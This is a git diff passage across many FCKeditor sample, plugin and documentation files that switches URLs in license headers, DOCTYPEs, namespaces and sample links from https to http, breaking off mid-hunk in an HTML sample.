diff --git a/admin/FCKeditor/_documentation.html b/admin/FCKeditor/_documentation.html index 2c9953c..fe8f02b 100755 --- a/admin/FCKeditor/_documentation.html +++ b/admin/FCKeditor/_documentation.html @@ -1,6 +1,6 @@ -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,17 +9,17 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - Documentation</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> @@ -32,7 +32,7 @@ <h1> FCKeditor Documentation</h1> <p> - You can find the official documentation for FCKeditor online, at <a href="https://wiki.fckeditor.net/"> - https://wiki.fckeditor.net/</a>.</p> + You can find the official documentation for FCKeditor online, at <a href="http://wiki.fckeditor.net/"> + http://wiki.fckeditor.net/</a>.</p> </body> </html> diff --git a/admin/FCKeditor/_samples/_plugins/findreplace/fckplugin.js b/admin/FCKeditor/_samples/_plugins/findreplace/fckplugin.js index cbadff3..13ee48c 100755 --- a/admin/FCKeditor/_samples/_plugins/findreplace/fckplugin.js +++ b/admin/FCKeditor/_samples/_plugins/findreplace/fckplugin.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/_samples/_plugins/findreplace/find.html b/admin/FCKeditor/_samples/_plugins/findreplace/find.html index 6b473bd..ffd8de4 100755 --- a/admin/FCKeditor/_samples/_plugins/findreplace/find.html +++ b/admin/FCKeditor/_samples/_plugins/findreplace/find.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/_samples/_plugins/findreplace/lang/en.js b/admin/FCKeditor/_samples/_plugins/findreplace/lang/en.js index 12e13e9..34e6fea 100755 --- a/admin/FCKeditor/_samples/_plugins/findreplace/lang/en.js +++ b/admin/FCKeditor/_samples/_plugins/findreplace/lang/en.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/_samples/_plugins/findreplace/lang/fr.js b/admin/FCKeditor/_samples/_plugins/findreplace/lang/fr.js index 9054cd9..bd2235a 100755 --- a/admin/FCKeditor/_samples/_plugins/findreplace/lang/fr.js +++ b/admin/FCKeditor/_samples/_plugins/findreplace/lang/fr.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/_samples/_plugins/findreplace/lang/it.js b/admin/FCKeditor/_samples/_plugins/findreplace/lang/it.js index ed23b67..c077316 100755 --- a/admin/FCKeditor/_samples/_plugins/findreplace/lang/it.js +++ b/admin/FCKeditor/_samples/_plugins/findreplace/lang/it.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/_samples/_plugins/findreplace/replace.html b/admin/FCKeditor/_samples/_plugins/findreplace/replace.html index c911f77..82d548f 100755 --- a/admin/FCKeditor/_samples/_plugins/findreplace/replace.html +++ b/admin/FCKeditor/_samples/_plugins/findreplace/replace.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/_samples/_plugins/samples/fckplugin.js b/admin/FCKeditor/_samples/_plugins/samples/fckplugin.js index 7cd50e3..7be1774 100755 --- a/admin/FCKeditor/_samples/_plugins/samples/fckplugin.js +++ b/admin/FCKeditor/_samples/_plugins/samples/fckplugin.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/_samples/afp/fck.afpa.code b/admin/FCKeditor/_samples/afp/fck.afpa.code index 68ab82f..401ee90 100755 --- a/admin/FCKeditor/_samples/afp/fck.afpa.code +++ b/admin/FCKeditor/_samples/afp/fck.afpa.code @@ -1,4 +1,4 @@ - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -7,13 +7,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/_samples/afp/sample01.afp b/admin/FCKeditor/_samples/afp/sample01.afp index 4f43f80..6b770b3 100755 --- a/admin/FCKeditor/_samples/afp/sample01.afp +++ b/admin/FCKeditor/_samples/afp/sample01.afp @@ -1,5 +1,5 @@ <% - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -39,7 +39,7 @@ sBasePath="../../../fckeditor/" && Change this to your local path lcText=[This is some <strong>sample text</strong>. You are using ] - lcText=lcText+[<a href='https://www.fckeditor.net/'>FCKeditor</a>.] + lcText=lcText+[<a href='http://www.fckeditor.net/'>FCKeditor</a>.] oFCKeditor = CREATEOBJECT("FCKeditor") oFCKeditor.fckeditor("FCKeditor1") diff --git a/admin/FCKeditor/_samples/afp/sample02.afp b/admin/FCKeditor/_samples/afp/sample02.afp index 1be4ba7..cbf8dc8 100755 --- a/admin/FCKeditor/_samples/afp/sample02.afp +++ b/admin/FCKeditor/_samples/afp/sample02.afp @@ -1,5 +1,5 @@ <% - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -98,7 +98,7 @@ ENDIF lcText=[This is some <strong>sample text</strong>. You are using ] - lcText=lcText+[<a href='https://www.fckeditor.net/'>FCKeditor</a>.] + lcText=lcText+[<a href='http://www.fckeditor.net/'>FCKeditor</a>.] oFCKeditor.BasePath = sBasePath oFCKeditor.cValue = lcText diff --git a/admin/FCKeditor/_samples/afp/sample03.afp b/admin/FCKeditor/_samples/afp/sample03.afp index 6a8a6c8..3d7fd17 100755 --- a/admin/FCKeditor/_samples/afp/sample03.afp +++ b/admin/FCKeditor/_samples/afp/sample03.afp @@ -1,5 +1,5 @@ <% - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -76,7 +76,7 @@ ENDIF lcText=[This is some <strong>sample text</strong>. You are using ] - lcText=lcText+[<a href='https://www.fckeditor.net/'>FCKeditor</a>.] + lcText=lcText+[<a href='http://www.fckeditor.net/'>FCKeditor</a>.] oFCKeditor.BasePath = sBasePath oFCKeditor.cValue = lcText diff --git a/admin/FCKeditor/_samples/afp/sample04.afp b/admin/FCKeditor/_samples/afp/sample04.afp index af2d1e1..fb878b8 100755 --- a/admin/FCKeditor/_samples/afp/sample04.afp +++ b/admin/FCKeditor/_samples/afp/sample04.afp @@ -1,5 +1,5 @@ <% - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -83,7 +83,7 @@ ENDIF lcText=[This is some <strong>sample text</strong>. You are using ] - lcText=lcText+[<a href='https://www.fckeditor.net/'>FCKeditor</a>.] + lcText=lcText+[<a href='http://www.fckeditor.net/'>FCKeditor</a>.] oFCKeditor.BasePath = sBasePath oFCKeditor.cValue = lcText diff --git a/admin/FCKeditor/_samples/afp/sampleposteddata.afp b/admin/FCKeditor/_samples/afp/sampleposteddata.afp index 1854789..c3464f6 100755 --- a/admin/FCKeditor/_samples/afp/sampleposteddata.afp +++ b/admin/FCKeditor/_samples/afp/sampleposteddata.afp @@ -1,5 +1,5 @@ <% - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/_samples/asp/sample01.asp b/admin/FCKeditor/_samples/asp/sample01.asp index a588610..e37302b 100755 --- a/admin/FCKeditor/_samples/asp/sample01.asp +++ b/admin/FCKeditor/_samples/asp/sample01.asp @@ -1,7 +1,7 @@ <%@ codepage="65001" language="VBScript" %> <% Option Explicit %> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -10,13 +10,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -24,8 +24,8 @@ --> <% ' You must set "Enable Parent Paths" on your web site in order this relative include to work. %> <!-- #INCLUDE file="../../fckeditor.asp" --> -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> -<html xmlns="https://www.w3.org/1999/xhtml"> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - Sample</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> @@ -52,7 +52,7 @@ sBasePath = Left( sBasePath, InStrRev( sBasePath, "/_samples" ) ) Dim oFCKeditor Set oFCKeditor = New FCKeditor oFCKeditor.BasePath = sBasePath -oFCKeditor.Value = "This is some <strong>sample text</strong>. You are using <a href=""https://www.fckeditor.net/"">FCKeditor</a>." +oFCKeditor.Value = "This is some <strong>sample text</strong>. You are using <a href=""http://www.fckeditor.net/"">FCKeditor</a>." oFCKeditor.Create "FCKeditor1" %> <br /> diff --git a/admin/FCKeditor/_samples/asp/sample02.asp b/admin/FCKeditor/_samples/asp/sample02.asp index 356e76d..323e168 100755 --- a/admin/FCKeditor/_samples/asp/sample02.asp +++ b/admin/FCKeditor/_samples/asp/sample02.asp @@ -1,7 +1,7 @@ <%@ CodePage=65001 Language="VBScript"%> <% Option Explicit %> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -10,13 +10,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -98,7 +98,7 @@ Else oFCKeditor.Config("DefaultLanguage") = Request.QueryString("Lang") End If -oFCKeditor.Value = "This is some <strong>sample text</strong>. You are using <a href=""https://www.fckeditor.net/"">FCKeditor</a>." +oFCKeditor.Value = "This is some <strong>sample text</strong>. You are using <a href=""http://www.fckeditor.net/"">FCKeditor</a>." oFCKeditor.Create "FCKeditor1" %> <br> diff --git a/admin/FCKeditor/_samples/asp/sample03.asp b/admin/FCKeditor/_samples/asp/sample03.asp index 7f6caa4..0e1226f 100755 --- a/admin/FCKeditor/_samples/asp/sample03.asp +++ b/admin/FCKeditor/_samples/asp/sample03.asp @@ -1,7 +1,7 @@ <%@ CodePage=65001 Language="VBScript"%> <% Option Explicit %> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -10,13 +10,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -82,7 +82,7 @@ If Request.QueryString("Toolbar") <> "" Then oFCKeditor.ToolbarSet = Server.HTMLEncode( Request.QueryString("Toolbar") ) End If -oFCKeditor.Value = "This is some <strong>sample text</strong>. You are using <a href=""https://www.fckeditor.net/"">FCKeditor</a>." +oFCKeditor.Value = "This is some <strong>sample text</strong>. You are using <a href=""http://www.fckeditor.net/"">FCKeditor</a>." oFCKeditor.Create "FCKeditor1" %> <br> diff --git a/admin/FCKeditor/_samples/asp/sample04.asp b/admin/FCKeditor/_samples/asp/sample04.asp index bebfffa..40d72ab 100755 --- a/admin/FCKeditor/_samples/asp/sample04.asp +++ b/admin/FCKeditor/_samples/asp/sample04.asp @@ -1,7 +1,7 @@ <%@ CodePage=65001 Language="VBScript"%> <% Option Explicit %> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -10,13 +10,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -88,7 +88,7 @@ If Request.QueryString("Skin") <> "" Then oFCKeditor.Config("SkinPath") = sBasePath + "editor/skins/" & Server.HTMLEncode( Request.QueryString("Skin") ) + "/" End If -oFCKeditor.Value = "This is some <strong>sample text</strong>. You are using <a href=""https://www.fckeditor.net/"">FCKeditor</a>." +oFCKeditor.Value = "This is some <strong>sample text</strong>. You are using <a href=""http://www.fckeditor.net/"">FCKeditor</a>." oFCKeditor.Create "FCKeditor1" %> <br> diff --git a/admin/FCKeditor/_samples/asp/sampleposteddata.asp b/admin/FCKeditor/_samples/asp/sampleposteddata.asp index 15bfcba..654204b 100755 --- a/admin/FCKeditor/_samples/asp/sampleposteddata.asp +++ b/admin/FCKeditor/_samples/asp/sampleposteddata.asp @@ -1,7 +1,7 @@ <%@ CodePage=65001 Language="VBScript"%> <% Option Explicit %> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -10,13 +10,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/_samples/cfm/sample01.cfm b/admin/FCKeditor/_samples/cfm/sample01.cfm index 6734b6e..b843a98 100755 --- a/admin/FCKeditor/_samples/cfm/sample01.cfm +++ b/admin/FCKeditor/_samples/cfm/sample01.cfm @@ -1,6 +1,6 @@ <cfsetting enablecfoutputonly="true" showdebugoutput="false"> <!--- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -45,7 +45,7 @@ This sample displays a normal HTML form with a FCKeditor with full features enab template="../../fckeditor.cfm" basePath="#Left(cgi.script_name, FindNoCase('_samples', cgi.script_name)-1)#" instanceName="myEditor" - value='This is some sample text. You are using <a href="https://fckeditor.net/" target="_blank">FCKeditor</a>.' + value='This is some sample text. You are using <a href="http://fckeditor.net/" target="_blank">FCKeditor</a>.' width="100%" height="200" > diff --git a/admin/FCKeditor/_samples/cfm/sample02_mx.cfm b/admin/FCKeditor/_samples/cfm/sample02_mx.cfm index 53daab0..8f00694 100755 --- a/admin/FCKeditor/_samples/cfm/sample02_mx.cfm +++ b/admin/FCKeditor/_samples/cfm/sample02_mx.cfm @@ -1,6 +1,6 @@ <cfsetting enablecfoutputonly="true"> <!--- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -70,7 +70,7 @@ This sample displays a normal HTML form with a FCKeditor with full features enab fckEditor = createObject("component", "#basePath#fckeditor"); fckEditor.instanceName = "myEditor"; - fckEditor.value = 'This is some sample text. You are using <a href="https://fckeditor.net/" target="_blank">FCKeditor</a>.'; + fckEditor.value = 'This is some sample text. You are using <a href="http://fckeditor.net/" target="_blank">FCKeditor</a>.'; fckEditor.basePath = basePath; fckEditor.width = "100%"; fckEditor.height = 300; diff --git a/admin/FCKeditor/_samples/default.html b/admin/FCKeditor/_samples/default.html index 9f40d75..449fa55 100755 --- a/admin/FCKeditor/_samples/default.html +++ b/admin/FCKeditor/_samples/default.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/_samples/html/sample01.html b/admin/FCKeditor/_samples/html/sample01.html index ff9227e..4dd38be 100755 --- a/admin/FCKeditor/_samples/html/sample01.html +++ b/admin/FCKeditor/_samples/html/sample01.html @@ -1,6 +1,6 @@ -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Sample page. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - Sample</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> @@ -48,7 +48,7 @@ var sBasePath = 